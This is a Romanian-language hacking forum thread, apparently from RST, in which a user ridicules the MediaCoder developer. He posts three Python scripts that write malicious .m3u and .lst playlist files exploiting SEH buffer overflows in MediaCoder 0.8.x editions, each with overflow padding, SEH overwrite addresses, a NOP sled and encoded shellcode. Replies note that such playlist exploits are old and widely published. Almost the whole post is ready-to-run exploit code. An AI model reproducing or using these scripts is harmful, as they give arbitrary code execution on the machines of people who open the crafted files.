Jump to content
neox

All Mediacoder Product / Un programator de 2 lei :)

Recommended Posts

Posted (edited)

Salut la toti baieti

Azi nu am avut ce face si am dat de pagina asta MediaCoder - more than a universal audio/video transcoder - MediaCoder official website toate bune si frumoase dar nu am vazut programator asa prost ca asta :))

Are urmatoarele producte:

MediaCoder - Choose your MediaCoder edition

Toate productele sunt vulnerabile :)) mi-ar fi rusine

pretul la producte :MediaCoder Premium - The fast and low-cost solution for cooperative transcoding applications

All Mediacoder Product SEH Buffer Overflow format m3u


#!/usr/bin/python
import os
import sys
from struct import pack
from time import sleep

if os.name == "nt":
os.system("cls")
os.system("color 3f")

else:
os.system("clear")


print """
[+]Exploit Title: All Mediacoder Product SEH Buffer Overflow
[+]Download All Product: http://www.mediacoderhq.com/editions.html
[+]Vulnerable Product:!
[+]Mediacoder 0.8.22.5525
[+]Mediacoder Web Video Edition 0.8.22
[+]Mediacoder Handsets Edition 0.8.22
[+]Mediacoder iPhone Edition 0.8.22
[+]MediaCoder-PSP Edition 0.8.22
[+]Vulnerabilities File Format:m3u
[+]Date (found): 21.06.2013
[+]Date (publish): 21.06.2013
[+]Founder: metacom
[+]RST
[+]Tested on: Windows Xp pro-sp3 English
"""

buffer = "http://" + "\x41" * 845
nseh = "\xEB\x06\xFF\xFF"
seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll
nops= "\x90" * 80
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c
shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e"
"\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10"
"\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7"
"\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5"
"\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97"
"\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f"
"\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd"
"\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2"
"\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04"
"\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3"
"\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d"
"\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e"
"\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4"
"\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f"
"\xaa\x4d")
exploit = buffer + nseh + seh + nops + shell

try:
rst= open("All-MediaCoder.m3u",'w')
rst.write(exploit)
rst.close()
raw_input("\nExploit file created!\n")
except:
print "Error"

All Mediacoder Product SEH Buffer Overflow format lst


#!/usr/bin/python
import os
import sys
from struct import pack
from time import sleep

if os.name == "nt":
os.system("cls")
os.system("color 3f")

else:
os.system("clear")


print """
[+]Exploit Title: All Mediacoder Product SEH Buffer Overflow
[+]Download All Product: [url=http://www.mediacoderhq.com/editions.html]MediaCoder - Choose your MediaCoder edition[/url]
[+]Vulnerable Product:!
[+]Mediacoder 0.8.22.5525
[+]Mediacoder Web Video Edition 0.8.22
[+]Mediacoder Handsets Edition 0.8.22
[+]Mediacoder iPhone Edition 0.8.22
[+]MediaCoder-PSP Edition 0.8.22
[+]Vulnerabilities File Format:lst
[+]Date (found): 21.06.2013
[+]Date (publish): 21.06.2013
[+]Founder: metacom
[+]RST
[+]Tested on: Windows Xp pro-sp3 English
"""

buffer = "http://" + "\x41" * 845
nseh = "\xEB\x06\xFF\xFF"
seh= pack('<I',0x66012E63)# 66012E63 POP EBX libiconv-2.dll
nops= "\x90" * 80
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c
shell= ("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e"
"\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10"
"\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7"
"\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5"
"\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97"
"\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f"
"\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd"
"\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2"
"\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04"
"\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3"
"\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d"
"\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e"
"\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4"
"\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f"
"\xaa\x4d")
exploit = buffer + nseh + seh + nops + shell

try:
rst= open("All-MediaCoder.lst",'w')
rst.write(exploit)
rst.close()
raw_input("\nExploit file created!\n")
except:
print "Error"

MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit (SEH)


#!/usr/bin/python
print """
[+]Exploit Title: MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit (SEH)
[+]Download link: http://www.mediacoderhq.com/device/mpx.htm
[+]Vulnerable Product: MediaCoder (Personal Media Player) Edition
[+]Date (found): 21.06.2013
[+]Date (publish): 21.06.2013
[+]Founder: metacom
[+]RST
[+]Tested on: Windows Xp pro-sp3 English
"""
from struct import pack

junk = "http://" + "\x41" * 765
nseh = "\xeb\x06\x90\x90"
seh = pack('<I',0x66D81575)#66D81575 5F POP EDI avutil-52.dll
nops= "\x90" * 80
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x5c' -t c
shell=("\xbf\x8e\xa0\x35\xac\xda\xda\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x33\x83\xc3\x04\x31\x7b\x0e\x03\xf5\xae\xd7\x59\xf5\x47\x9e"
"\xa2\x05\x98\xc1\x2b\xe0\xa9\xd3\x48\x61\x9b\xe3\x1b\x27\x10"
"\x8f\x4e\xd3\xa3\xfd\x46\xd4\x04\x4b\xb1\xdb\x95\x7d\x7d\xb7"
"\x56\x1f\x01\xc5\x8a\xff\x38\x06\xdf\xfe\x7d\x7a\x10\x52\xd5"
"\xf1\x83\x43\x52\x47\x18\x65\xb4\xcc\x20\x1d\xb1\x12\xd4\x97"
"\xb8\x42\x45\xa3\xf3\x7a\xed\xeb\x23\x7b\x22\xe8\x18\x32\x4f"
"\xdb\xeb\xc5\x99\x15\x13\xf4\xe5\xfa\x2a\x39\xe8\x03\x6a\xfd"
"\x13\x76\x80\xfe\xae\x81\x53\x7d\x75\x07\x46\x25\xfe\xbf\xa2"
"\xd4\xd3\x26\x20\xda\x98\x2d\x6e\xfe\x1f\xe1\x04\xfa\x94\x04"
"\xcb\x8b\xef\x22\xcf\xd0\xb4\x4b\x56\xbc\x1b\x73\x88\x18\xc3"
"\xd1\xc2\x8a\x10\x63\x89\xc0\xe7\xe1\xb7\xad\xe8\xf9\xb7\x9d"
"\x80\xc8\x3c\x72\xd6\xd4\x96\x37\x28\x9f\xbb\x11\xa1\x46\x2e"
"\x20\xac\x78\x84\x66\xc9\xfa\x2d\x16\x2e\xe2\x47\x13\x6a\xa4"
"\xb4\x69\xe3\x41\xbb\xde\x04\x40\xd8\x81\x96\x08\x31\x24\x1f"
"\xaa\x4d")
exploit = junk + nseh + seh + nops + shell

try:
rst= open("mediacoder-pmp.m3u",'w')
rst.write(exploit)
rst.close()
raw_input("\nExploit file created!\n")
except:
print "Error"

Audiocoder l-am facut inainte l-am gasit pe sofpedia nu am stiut ca apartine de Mediacoder Product :))

https://rstforums.com/forum/68712-audiocoder-buffer-overflow-exploit-seh.rst

Edited by neox
  • Upvote 1
Posted

Exploituri lst si m3u au fost de ani de zile postate pe exploit-db ex: http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=m3u&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=, puteau si ei sa ia aminte, oricat de greu pare acest tip de vulnerabilitate odata invatat sunt foarte usor de exploatat si totodata puteau la fel de usor verificat nu doar in codul sursa....

Nush cum ti-a venit sa te iei fix de produsul astora facut in garaj, eu unul nici nu am auzit de ei:))

Posted (edited)
Exploituri lst si m3u au fost de ani de zile postate pe exploit-db ex: http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=m3u&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=, puteau si ei sa ia aminte, oricat de greu pare acest tip de vulnerabilitate odata invatat sunt foarte usor de exploatat si totodata puteau la fel de usor verificat nu doar in codul sursa....

Nush cum ti-a venit sa te iei fix de produsul astora facut in garaj, eu unul nici nu am auzit de ei:))

=)) da si eu cred ca in garaj au facut productele :))

Edited by neox

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...